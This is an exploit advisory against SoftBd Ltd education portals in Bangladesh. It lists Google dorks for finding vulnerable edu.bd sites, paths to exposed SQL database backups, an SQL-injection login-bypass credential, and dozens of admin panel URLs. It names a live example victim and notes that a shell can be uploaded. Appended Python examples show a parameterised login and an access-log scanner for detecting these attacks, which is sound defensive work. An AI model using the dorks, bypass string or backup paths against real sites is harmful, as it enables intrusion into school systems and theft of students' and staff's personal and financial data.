Design & Developed by SoftBd Ltd. Bangladesh Education Portals Multiple Vulnerabilities

2018.09.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################
# Exploit Title : Design & Developed by SoftBd Ltd. Bangladesh Education Portals Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : soft-bd.com ~ softbdltd.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE :
+ CWE-264 - Permissions, Privileges, and Access Controls
+ CWE-592 - Authentication Bypass Issues
+ CWE-434 - Unrestricted Upload of File with Dangerous Type
#################################################################################################
# Description :
Bangladesh’s leading custom software [ for Government and Education portals ] web application development company.
+ SoftBD Ltd | Best Website Design and Development Company in Bangladesh
# Google Dorks :
intext:DEVELOPED BY : SOFTBD Ltd. site:edu.bd
inurl:''Design & Developed by : SOFTBD Ltd.'' site:edu.bd
inurl:''/teachers_information.php site:edu.bd
inurl:''/student_information.php site:edu.bd
inurl:/holiday_calendar.php site:edu.bd
inurl:''/academic_calendar.php site:edu.bd
inurl:''/rules_regulation.php site:edu.bd
inurl:''/class_routine.php site:edu.bd
inurl:''/examination_routine.php site:edu.bd
inurl:''/3rd_&_4th_class_employee_information.php site:edu.bd
inurl:''/department.php?id=MDc= site:edu.bd
inurl:''/facilities.php?id=MQ== site:edu.bd
inurl:''/general_notice.php site:edu.bd
inurl:''/admission.php?id=MDc= site:edu.bd
inurl:''/teachers_information_archive.php site:edu.bd
inurl:''academic_calendar_view.php'' site:edu.bd
+ Database SQL Backup Download [ Navicat MySQL Data Transfer - Juicy Information here ] =>
TARGET/trust_college_db.sql
TARGET/school_system-current.sql
TARGET/school_system-last.sql
TARGET/school_system.sql
TARGET/school_system_fress.sql
# Administration Login Panel Path =>
TARGET/login_slide.php
# Exploit :
Admin Username : '=''or'
Admin Password : '=''or'
# Useable Admin Control Panel URL Links =>
/modules/dashboard/index.php
/modules/dashboard/school_profile.php
/modules/dashboard/calendar.php
/modules/dashboard/class_list.php
/modules/dashboard/session_list.php
/modules/dashboard/group_sms_excel_upload.php
/modules/system_module/index.php
/includes/components/sms_gateway_data_update.php
/modules/dashboard/school_social_network_link.php
/modules/dashboard/student_excel_upload.php
/modules/system_task/index.php
/modules/dashboard/teacher_excel_upload.php
/modules/dashboard/user_group.php
/modules/dashboard/user_group_role.php
/modules/accounts/tution.php
/modules/accounts/teacher_salary_add.php
/modules/accounts/keyword_setup.php
/modules/accounts/fee_setup.php
/modules/accounts/account_template.php
/modules/accounts/expenditure_add.php
/modules/accounts/due_payment_list.php
/modules/users/user_add_new.php
/modules/users/user_list.php
/modules/student/list.php
/modules/student/add_form_simple.php
/modules/student/student_promotion.php
/modules/student/student_list_report.php
/modules/student/lecture_sheet_download.php
/modules/student/advising_student.php
/modules/school_setup/basic.php
/modules/school_setup/class.php
/modules/school_setup/sms_template.php
/modules/school_setup/subject.php
/modules/school_setup/designation.php
/modules/school_setup/teacher_sarary_template.php
/modules/school_setup/class_routine.php
/modules/school_setup/period_setup.php
/modules/school_setup/school_sms_bill_payment.php
/modules/teacher/list.php
/modules/teacher/index.php
/modules/attendance/daily.php
/modules/teacher/schedule_rpt.php
/modules/teacher/lecture_sheet_upload.php
/modules/exam/exam_setup.php
/modules/exam/add_mark_list.php
/modules/exam/edit_mark_list.php
/modules/exam/exam_setup_edit_list.php
/modules/notice/sms_group_template.php
/modules/dashboard/user_group_role.php
/modules/report/student_fee_report.php
/modules/report/student_due_fee_report.php
/modules/report/teacher_salary_report.php
/modules/report/expenditure_report.php
/modules/report/income_report.php
/modules/report/account_statement_report.php
/modules/report/attendance_report.php
/modules/report/exam_report.php
/modules/report/student_exam_mark_report.php
/modules/report/std_exam_mark_rpt.php
/modules/report/sms_report.php
/modules/report/teacher_list_report.php
/modules/report/hostel_room_allocation.php
/modules/report/exam_attendance_sheet_list.php
/modules/report/exam_seat_planing_print_list.php
/modules/website/general_notice_list.php
/modules/website/departmental_notice_list.php
/modules/website/college_facilities_list.php
/modules/website/event_list.php
/modules/website/admission_list.php
/modules/website/slider_list.php
Note : On some of the vulnerable sites a shell can be uploaded.
#################################################################################################
# Example Vulnerable Site => uuc.edu.bd => [ Proof of Concept ] => archive.is/eGqUH
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
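The authentication bypass above (CWE-592) works only because the login page lets the submitted credential string take part in the SQL text. The following is an added example, not the vendor's code, showing the shape of a login check that is immune to it: the username is bound as a query parameter, the password is compared as a hash, and a cheap tripwire flags credential strings containing SQL quote syntax so that such attempts can be logged. The table, the demo user, the salt and the iteration count are constructed for the demonstration; the payload string is the one quoted in the advisory.

```python
"""
Added example (not SoftBd's code): a login lookup that does not build SQL
from user input, plus a tripwire for logging attempts such as the
advisory's '=''or' credential. The schema, demo user and salt are
constructed for this demonstration; production code would use the
application's real database and a per-user random salt.
"""
import hashlib
import hmac
import sqlite3

SALT = b"constructed-demo-salt"          # constructed; use a random per-user salt in practice
ITERATIONS = 100_000
BYPASS_PAYLOAD = "'=''or'"               # the credential string quoted in the advisory


def hash_password(password: str, salt: bytes = SALT) -> bytes:
    """PBKDF2-HMAC-SHA256 of the password; the stored value, never the plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def build_demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed administrator account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash BLOB)"
    )
    conn.execute(
        "INSERT INTO users (username, pw_hash) VALUES (?, ?)",
        ("admin", hash_password("correct horse battery staple")),
    )
    conn.commit()
    return conn


def authenticate(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: quotes in the input reach the driver as data, not SQL syntax."""
    row = conn.execute(
        "SELECT pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        # Do the same hashing work so a missing account is not revealed by timing.
        hash_password(password)
        return False
    # Constant-time comparison of stored hash against the hash of what was submitted.
    return hmac.compare_digest(row[0], hash_password(password))


def looks_like_injection(value: str) -> bool:
    """Tripwire for alerting: a legitimate credential never needs SQL quote syntax."""
    return "'" in value or '"' in value or "--" in value


if __name__ == "__main__":
    db = build_demo_db()
    print(authenticate(db, "admin", "correct horse battery staple"))  # True
    print(authenticate(db, BYPASS_PAYLOAD, BYPASS_PAYLOAD))            # False
    print(looks_like_injection(BYPASS_PAYLOAD))                        # True
```

Parameter binding makes the MySQL operator-precedence trick the payload relies on irrelevant: the bound string is compared byte for byte against the stored username and simply matches no row. The tripwire is not a substitute for that; it exists so the attempt shows up in logs and alerting.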

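Two of the advisory's findings leave a trail in ordinary web server access logs: the MySQL dump files sitting in the web root and direct hits on the /modules/ administrative pages. The following is an added example, not part of the advisory or the vendor's product, that scans combined-format access log lines for both. The log lines are constructed for the demonstration; the file names and path prefixes are taken from the advisory, and the check is generalised to flag any successful download of a .sql file rather than only the five names listed.

```python
"""
Added example (not from the advisory or vendor): flag, in Apache/nginx
combined-format access logs, (a) successful downloads of .sql dump files and
(b) requests to the administrative /modules/ and /includes/components/
pages. Log lines below are constructed; paths come from the advisory.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Dump file names listed in the advisory; any other .sql is flagged too.
DUMP_NAMES = {
    "trust_college_db.sql", "school_system-current.sql", "school_system-last.sql",
    "school_system.sql", "school_system_fress.sql",
}
ADMIN_PREFIXES = ("/modules/", "/includes/components/")

# Constructed sample log (RFC 5737 documentation addresses).
LOG_LINES = [
    '203.0.113.7 - - [04/Sep/2018:10:00:01 +0600] "GET /general_notice.php HTTP/1.1" 200 5123',
    '203.0.113.7 - - [04/Sep/2018:10:00:09 +0600] "GET /school_system.sql HTTP/1.1" 200 2048000',
    '203.0.113.7 - - [04/Sep/2018:10:01:15 +0600] "POST /login_slide.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [04/Sep/2018:10:01:16 +0600] "GET /modules/dashboard/index.php HTTP/1.1" 200 8800',
    '198.51.100.2 - - [04/Sep/2018:10:02:00 +0600] "GET /class_routine.php HTTP/1.1" 200 3300',
    '198.51.100.2 - - [04/Sep/2018:10:02:30 +0600] "GET /trust_college_db.sql HTTP/1.1" 404 512',
]


def classify(line: str):
    """Return (finding, ip, path) for a line worth alerting on, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]   # drop query string
    status = int(m.group("status"))
    name = path.rsplit("/", 1)[-1]
    if status == 200 and (name in DUMP_NAMES or name.lower().endswith(".sql")):
        return ("sql_dump_download", m.group("ip"), path)
    if status == 200 and path.startswith(ADMIN_PREFIXES):
        return ("admin_module_access", m.group("ip"), path)
    return None


def scan(lines):
    """All findings from an iterable of log lines, in log order."""
    return [f for f in (classify(l) for l in lines) if f is not None]


def summarize(findings) -> Counter:
    """Number of findings per client address, for triage."""
    return Counter(ip for _, ip, _ in findings)


if __name__ == "__main__":
    found = scan(LOG_LINES)
    for kind, ip, path in found:
        print(f"{kind:22s} {ip:15s} {path}")
    print(summarize(found))
```

A 404 for a dump file is deliberately not flagged: it shows someone probing, but nothing left the server. The admin-module rule will also fire for legitimate staff, so in practice it is combined with an allowlist of expected source addresses or correlated with a preceding successful login from the same client.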
